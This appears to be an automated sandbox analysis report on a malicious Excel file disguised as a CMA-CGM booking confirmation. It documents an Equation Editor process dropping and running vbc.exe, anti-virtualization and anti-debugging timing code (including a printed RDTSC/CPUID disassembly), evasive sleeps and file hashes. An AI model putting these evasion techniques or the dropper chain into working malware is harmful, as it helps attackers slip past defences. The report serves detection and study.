Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Stream path 'EncryptedPackage' entropy: 7.99856683358 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5852	6_2_003B5852
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B78B2	6_2_003B78B2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B28E2	6_2_003B28E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B513E	6_2_003B513E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4128	6_2_003B4128
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3920	6_2_003B3920
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B423F	6_2_003B423F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4277	6_2_003B4277
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4263	6_2_003B4263
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A46	6_2_003B5A46
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A84	6_2_003B5A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AFD	6_2_003B2AFD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AD6	6_2_003B2AD6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2470	6_2_003B2470
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B045E	6_2_003B045E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3C4D	6_2_003B3C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7CA5	6_2_003B7CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7488	6_2_003B7488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8DB4	6_2_003B8DB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7EFC	6_2_003B7EFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B46E4	6_2_003B46E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1FD9	6_2_003B1FD9

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B790A second address: 00000000003B79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007F2C903B46EAh 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007F2C903B46B4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B883C rdtsc

6_2_003B883C

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1664

Thread sleep time: -60000s >= -30000s

Jump to behavior

Anti Debugging:

Potentially malicious time measurement code found

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5852 Start: 003B4BE7 End: 003B480D	6_2_003B5852
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B513E Start: 003B4BE7 End: 003B480D	6_2_003B513E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4128 Start: 003B4BE7 End: 003B480D	6_2_003B4128
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B423F Start: 003B4BE7 End: 003B480D	6_2_003B423F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4277 Start: 003B4BE7 End: 003B480D	6_2_003B4277
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4263 Start: 003B4BE7 End: 003B480D	6_2_003B4263
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A46 Start: 003B5BED End: 003B480D	6_2_003B5A46
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7 Start: 003B4BE7 End: 003B480D	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B045E Start: 003B4BE7 End: 003B480D	6_2_003B045E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7CA5 Start: 003B4BE7 End: 003B480D	6_2_003B7CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7488 Start: 003B4BE7 End: 003B480D	6_2_003B7488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8DB4 Start: 003B4BE7 End: 003B480D	6_2_003B8DB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B46E4 Start: 003B4BE7 End: 003B480D	6_2_003B46E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1FD9 Start: 003B4BE7 End: 003B480D	6_2_003B1FD9

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B883C rdtsc

6_2_003B883C

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B28E2 mov eax, dword ptr fs:[00000030h]	6_2_003B28E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5201 mov eax, dword ptr fs:[00000030h]	6_2_003B5201
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7365 mov eax, dword ptr fs:[00000030h]	6_2_003B7365
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7 mov eax, dword ptr fs:[00000030h]	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33EC mov eax, dword ptr fs:[00000030h]	6_2_003B33EC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B348A mov eax, dword ptr fs:[00000030h]	6_2_003B348A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B6D92 mov eax, dword ptr fs:[00000030h]	6_2_003B6D92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7EFC mov eax, dword ptr fs:[00000030h]	6_2_003B7EFC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	450863
Product:	CloudBasic
Start time:	19:38:13
Start date:	19.07.2021
Sample:	CMA-CGM BOOKING CONFIRMATION.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	1a23b8c8e5fa52a917c92207a8316b55
SHA1:	7b481fe511b2132d2d2dc7cad79aa5ebda0d3388
SHA256:	9584a27702d6f6fdecc4589a5c87b529ef2c41ca556ddf9325999a4bdb58fcc3
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	08730CDD286A4C9D46B38BB6545AC311	001BB7B5B8D63E505661D7E4A178D08ABE6BBAD7	CB2A2537987E45C8461D40A0EC6C24215920519257134DB91DD1369FF5ABF342
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23D48948.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31DE0BA3.png	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced	17EC925977BED2836071429D7B476809	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B0A6367.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	686190A5D85E69ED0BBC8EBEE5C83031	F804655430E23D11C2B0EEA04D4BEB8906E846DB	E9CD452C9AD7CB24C2B7DA5BA5F89C7BFFFDC1322969DB710B1517A7602145E4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\887DE696.png	PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced	17EC925977BED2836071429D7B476809	7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C	83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D9EA3AA.jpeg	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3	722C1BE1697CFCEAE7BDEFB463265578	7D300A2BAB951B475477FAA308E4160C67AD93A9	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B536090D.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D831163C.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	FA5C58C789168CBA88CE40BF2F2D0B73	2D4DC13F61B62101B0913FE65D94B90DF1E26CC8	81449BAA21CD4441530A4D9DC0141C3BA640E93F25F894DF29E715227018B6A4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E885A8A9.jpeg	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3	722C1BE1697CFCEAE7BDEFB463265578	7D300A2BAB951B475477FAA308E4160C67AD93A9	2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3C39.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3C3A.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3C3B.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE456.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE457.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE487.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\Desktop\~$CMA-CGM BOOKING CONFIRMATION.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	08730CDD286A4C9D46B38BB6545AC311	001BB7B5B8D63E505661D7E4A178D08ABE6BBAD7	CB2A2537987E45C8461D40A0EC6C24215920519257134DB91DD1369FF5ABF342

Windows Analysis Report CMA-CGM BOOKING CONFIRMATION.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs